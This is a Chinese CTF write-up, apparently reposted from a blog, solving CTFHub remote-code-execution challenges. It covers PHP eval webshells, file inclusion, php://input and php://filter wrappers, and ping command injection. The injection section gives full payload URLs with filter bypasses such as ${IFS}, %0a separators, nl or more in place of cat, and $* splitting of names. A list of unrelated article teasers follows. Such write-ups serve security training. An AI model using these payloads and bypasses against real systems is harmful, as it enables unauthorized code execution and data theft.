CTFHub~RCE远程代码执行

news2024/11/15 16:19:08

在这里插入图片描述

0X01eval执行

# 进来我们直接看到了代码,大致意思就是传入一个参数cmd

image-20240805195106910

# 所以我们直接使用蚁剑进行连接,看一下能否成功

image-20240805195253661

# 接下来我们直接找出flag

image-20240805195358257

image-20240805195406059

0X02文件包含

# 打开页面发现一大堆代码
大体意思是如果file中没有flag字符串就执行下面的include $_GET["file"]否则就输出Hacker。
是将ctfhub传的参数使用php执行的,题目的意思也是让用shell木马

image-20240805201746663

# 所以我们直接使用hackber
payload:?file=shell.txt
post传参:ctfhub=system("ls"); 查看当前目录

image-20240805203011529

# 然后再上一级目录,不断尝试发现成功
ctfhub=system("ls ../../../");

image-20240805203220663

# 由于我们现在在根目录下,所以直接cat /flag

image-20240805203356535

0X03php://input

# 发现页面是代码,我们解析了一下发现大体的意思是:
如果有就输出hacker

没有就进行include

PHPinfo当中也表明php://input可以用

image-20240805195944460

# 所以我们通过抓包来构造
payload:?file=php://input
post传参:<?php system("ls"); ?> 查看当前目录

image-20240805200231653

image-20240805200444282

# 没有发现,再上一级

image-20240805200631337

# 还是没有发现,继续上一级

image-20240805200707162

# 还是没有flag,继续上一级

image-20240805200815628

# 发现flag,我们直接在根目录下查看falg的内容

image-20240805201249935

0X04远程包含

# 这页面一看就有文件包含

image-20240805203634171

# 检查一下phpinfo的环境是否有问题,发现allow开关都是打开的

image-20240805203832515

# 因此我们直接使用hackber
payload:?file=php://input
post传参:<?php system("ls"); ?> 查看当前目录

image-20240805204211219

# 发现hackbar整不出来,所以我们只能使用burp抓包测试

image-20240805205100172

# 因此,我们只需要cat /flag就可以拿捏了

image-20240805205154274

0X05读取源代码

# 看一下页面,发现和前面差不多,开整

image-20240805210457747

# 既然要等于php://  和上面的题一样,我们直接梭哈

image-20240805210825431

# 呀,发现闹不成,那我们就得引用伪协议,开始php://filter/resource=/flag干

image-20240805211012167

# 好家伙,直接拿下

image-20240805211120068

0X06命令注入

# 继续看页面的源代码
大概意思是检查用户输入的 GET 请求,判断用户是否输入了 ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 

image-20240805211910528

# 输入127.0.0.1,发现可以正常回显

image-20240805212028426

# 在url中加上管道符和ls  发现两个文件夹
http://challenge-dbbf1149e465c434.sandbox.ctfhub.com:10800/?ip=127.0.0.1 | ls

image-20240805212208915

# 所以我们直接访问,因为index.php就是这个页面,所以我们访问另一个
http://challenge-dbbf1149e465c434.sandbox.ctfhub.com:10800/?ip=127.0.0.1 | cat 28676317279045.php

image-20240805212401111

image-20240805212511619

# 发现页面什么也没有,我们看一下源代码

image-20240805212640154

成功拿捏!!!

0X07过滤cat

# 查看页面,我们直接输入127.0.0.1看一下

image-20240805213115386

# 没啥问题,那我们使用管道符查看一下文件
http://challenge-e24162a8e64e3beb.sandbox.ctfhub.com:10800/?ip=127.0.0.1 | ls

image-20240805213230749

# 又发现这个可疑的家伙,可是我们这题把cat给过滤了 既然知道是linux系统,我们就可以使用其他方法去查看文件
http://challenge-e24162a8e64e3beb.sandbox.ctfhub.com:10800/?ip=127.0.0.1 | more flag_28930242863161.php

image-20240805213520640

# 发现又看不了flag,只能继续查看页面源码

image-20240805213617294

0X08过滤空格

# 还是查看页面然后输入127.0.0.1

image-20240805213826953

# 发现还是没啥问题,但是过滤了空格,所以我们得找一个替换看一下文件
http://challenge-f07b17a6d186a83d.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls

//常见方法有< 、< >、%20(space)、%09(tab)、\$IFS\$9、 \${IFS}、$IFS等

image-20240805214115839

# 找到了flag,所以我们直接使用绕过方法来查看
http://challenge-f07b17a6d186a83d.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%3Cflag_64452980321037.php

image-20240805214305581

# 无法查看页面,直接查看源代码得出flag

image-20240805214346790

0X09过滤目录分隔符

# 查看页面我们还是输入127.0.0.1

image-20240805214853000

# 没啥大问题 我们查看发现有一个目录,所以我们得进这个目录后在操作

image-20240805215059978

# 既然目录分隔符让过滤了,所以我们就一步一步执行
http://challenge-2c4c30ba2ea7d9a8.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls;cd flag_is_here

image-20240805215728013

# 下一步我们就要看它目录下的文件了
http://challenge-2c4c30ba2ea7d9a8.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls;cd%20flag_is_here;ls

image-20240805215821819

# 然后再进行查看flag
http://challenge-2c4c30ba2ea7d9a8.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls;cd%20flag_is_here;ls;cat%20flag_147411187822789.php

image-20240805215933689

# 看源码然发现flag

image-20240805220034669

0X0a过滤运算符

# 查看页面然后输入127.0.0.1

image-20240805220224865

# 没大问题,过滤运算符,我们试一下;行不行
http://challenge-b07dfe86254f8b96.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls

image-20240805220345371

# 发现可以,那么直接看文件flag就可以了
http://challenge-b07dfe86254f8b96.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat%20flag_55811578117307.php

image-20240805220444397

# 继续看源码出结果

image-20240805220522467

0X0b综合过滤练习

# 这道题提示我们过滤前几个小结的,我们大概就知道怎么回事了

image-20240805221608328

# ls没过滤,但是过滤;,所以我们使用%0a来代替
http://challenge-9810a64820389800.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0als

image-20240805221723248

# ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,空格可以用${IFS}代替,在没有定义的情况下,$*在shell命令执行下为空,url编码中,%0a是换行符,%0d是回车符,可以用这两个进行命令拼接。
http://challenge-9810a64820389800.sandbox.ctfhub.com:10800/?ip=%0Als${IFS}fl$*a$*g_is_here#

image-20240805221837583

# 现在我们要查看flag
http://challenge-9810a64820389800.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl$*a$*g_is_here%0anl${IFS}f$*la$*g_5740333213378.php#

image-20240805222040664

# 现在我们要查看flag
http://challenge-9810a64820389800.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl$*a$*g_is_here%0anl${IFS}f$*la$*g_5740333213378.php#
# 还是得看源码

image-20240805222104427
好小子,离成功又近一步!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1984144.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【linux深入剖析】线程控制 | 多线程

&#x1f341;你好&#xff0c;我是 RO-BERRY &#x1f4d7; 致力于C、C、数据结构、TCP/IP、数据库等等一系列知识 &#x1f384;感谢你的陪伴与支持 &#xff0c;故事既有了开头&#xff0c;就要画上一个完美的句号&#xff0c;让我们一起加油 目录 1. 创建线程2. POSIX线程…

基于Kubernetes v1.25.0和Docker部署高可用集群(说明篇)

目录描述 Kubernetes组件说明 特定接口CRI、CNI、CSI Kubernetes v1.25集群创建方案选择 一、Kubernetes组件说明 Docker 的运行机制 运行机制详解&#xff1a; docker client&#xff1a;命令行输入的docker命令就是一个docker客户端 docker Engine&#xff1a;Engine也…

Java: 死锁问题详解(5000字)

文章目录 死锁的出现场景1. 一个线程一把锁,这个线程针对这把锁,连续加锁了两次2. 两个线程,两把锁3. N个线程 , M个锁4. 内存可见性为什么会出现内存可见性问题呢?解决方法 volatile关键字 总结synchronized:死锁的四个必要条件(缺一不可)[重点]:内存可见性问题: 死锁的出现场…

PCL安装与配置(PCL1.9.1+MSVC2017)

为了和我的VS的版本VS 2017对应&#xff0c;PCL下载的也是msvc_2017,PCL msvc2017最新的则是1.901版本&#xff0c;我们就以PCL 1.9.1为例了。&#xff08;如果你的vs是2019和2022&#xff0c;一定要注意PCL的版本&#xff09;。 一、下载PCL 我们打开PCL的github下载地址&am…

GDB调试器

GDB调试器 GDB的主要功能 常见命令 3、实战 1、生成能调试的执行文件&#xff08;一定要加-g&#xff09; 第一个是不能调试的 第二个这样加了-g才能进行调试 如果没加-g 执行gdb 执行文件&#xff08;会报下面这个 &#xff09; 像这样才是正常的 执行 gdb a_yes_g 这…

SSM计算机组成原理课程平台-计算机毕设定制-附项目源码(可白嫖)50168

摘 要 21世纪的今天&#xff0c;随着社会的不断发展与进步&#xff0c;人们对于信息科学化的认识&#xff0c;已由低层次向高层次发展&#xff0c;由原来的感性认识向理性认识提高&#xff0c;管理工作的重要性已逐渐被人们所认识&#xff0c;科学化的管理&#xff0c;使信息存…

金融行业到底该选择什么样的FTP替代方案?

2018年以来&#xff0c;受“华为、中兴事件”影响&#xff0c;我国科技尤其是上游核心技术受制于人的现状对我 国经济发展提出了严峻考验。在全球产业从工业经济向数字经济升级的关键时期&#xff0c;中国明确 “数字中国”建设战略&#xff0c; 抢占数字经济产业链制高点。 在…

Python开发工具PyCharm入门指南 - 用户界面主题更改

JetBrains PyCharm是一种Python IDE&#xff0c;其带有一整套可以帮助用户在使用Python语言开发时提高其效率的工具。此外&#xff0c;该IDE提供了一些高级功能&#xff0c;以用于Django框架下的专业Web开发。 界面主题定义了窗口、对话框、按钮和用户界面的所有可视元素的外观…

vscode开发avalonia

安装 安装.net 8 安装avalonia模板 dotnet new install Avalonia.Templates创建项目 dotnet new avalonia.app -o GetStartedApp安装c# dev kit插件和Avalonia for VSCode Community dotnet run运行 修改代码 MainWindow.axaml <Window xmlns"https://githu…

企业层面经济政策不确定性感知数据(2001-2023年)

1.指标介绍 企业经济政策不确定性感知指的是企业在面对政府经济政策变动时所感受到的风险和不确定性程度&#xff0c;这种感知会影响企业的投资决策、生产计划和市场策略 文章根据上市公司披露的MD&A文本&#xff0c;提取指标衡量企业个体面临的经济政策不确定性。 2.参…

了解线性回归、岭回归和套索回归

逐步对 Linear、Ridge 和 Lasso 回归进行数学理解。 ​ LASSO&#xff08;左&#xff09;和岭回归&#xff08;右&#xff09;的约束区域 一、说明 在本文中&#xff0c;我们将深入探讨机器学习中两种基本正则化技术的基础和应用&#xff1a;Ridge 回归和 Lasso 回归。这些方…

脊髓损伤小伙伴的活力重启秘籍! 让我们一起动起来,拥抱不一样的精彩生活✨

Hey小伙伴们~&#x1f44b; 今天咱们来聊聊一个超级重要又温暖的话题——脊髓损伤后的锻炼大法来啦&#xff01;&#x1f389; 记住&#xff0c;无论遇到什么挑战&#xff0c;我们都要像打不死的小强一样&#xff0c;活力满满地面对每一天&#xff01;&#x1f4aa; 首先&#…

基础进阶-搭建pxe网络安装环境实现服务器自动部署

目录 原理解释 ​编辑 开机界面解释 搭建步骤 下载环境需要用到的基本程序 查看帮助 帮助内容解释 环境搭建 修改 DHCP 修改 default 文件 测试 原理解释 开机界面解释 在开机界面中&#xff0c;圈起来的部分显示的就是光盘&#xff0c;我们需要将光盘转换成网络的 在…

.NET内网实战:模拟Installer关闭Defender

01基本介绍 02编码实现 原理上通过Windows API函数将当前进程的权限提升至TrustedInstaller&#xff0c;从而实现了对Windows Defender服务的控制。通常可以利用Windows API中的OpenSCManager、OpenProcessToken、ImpersonateLoggedOnUser以及ControlService等函数协同工作&am…

Modbus-Ascii详解

目录 Modbus-Ascii详解 Modbus-Ascii帧结构 LRC效验 将数据字节转成ASCII 将返回帧转为数据字节 Modbus-Ascii的实现 使用NModbus4实现Modbus-Ascii 实例 Modbus-Ascii详解 Modbus ASCII是一种将二进制数据转换为可打印的ASCII字符的通信协议&#xff0c;‌每个8位数据需要两…

WPF学习(4)- VirtualizingStackPanel (虚拟化元素)+Canvas控件(绝对布局)

VirtualizingStackPanel虚拟化元素 VirtualizingStackPanel 类&#xff08;虚拟化元素&#xff09;和StackPanel 类在用法上几乎差不多。其作用是在水平或垂直的一行中排列并显示内容。它继承于一个叫VirtualizingPanel的抽象类&#xff0c;而这个VirtualizingPanel抽象类继承…

AI基础架构-NVLink 技术详解

AI Infra 基础知识 - NVLink 入门 NVLink&#xff0c;一种专有互连硬件&#xff0c;实现Nvidia GPU与CPU之间的高效、一致数据和控制传输&#xff0c;提升多GPU系统性能。 概述 NVLink 于 2014 年初发布&#xff0c;旨在作为 PCI Express 的替代解决方案&#xff0c;具有更…

Java零基础之多线程篇:线程同步

哈喽&#xff0c;各位小伙伴们&#xff0c;你们好呀&#xff0c;我是喵手。运营社区&#xff1a;C站/掘金/腾讯云&#xff1b;欢迎大家常来逛逛 今天我要给大家分享一些自己日常学习到的一些知识点&#xff0c;并以文字的形式跟大家一起交流&#xff0c;互相学习&#xff0c;一…

Java13.0标准之重要特性及用法实例(二十三)

简介&#xff1a; CSDN博客专家&#xff0c;专注Android/Linux系统&#xff0c;分享多mic语音方案、音视频、编解码等技术&#xff0c;与大家一起成长&#xff01; 新书发布&#xff1a;《Android系统多媒体进阶实战》&#x1f680; 优质专栏&#xff1a; Audio工程师进阶系列…

【第三版 系统集成项目管理工程师】第9章 项目管理概论

持续更新。。。。。。。。。。。。。。。 【第三版】第九章 项目管理概论 9.1 PMBOK的发展9.2 项目基本要素9.2.1项目基础 P3041.独特的产品、服务或成果-P3042.临时性工作-P3043.项目驱动变更-P3054.项目创造业务价值-P3055.项目启动背景-P306 9.2.2项目管理 P3069.2.2 项目管…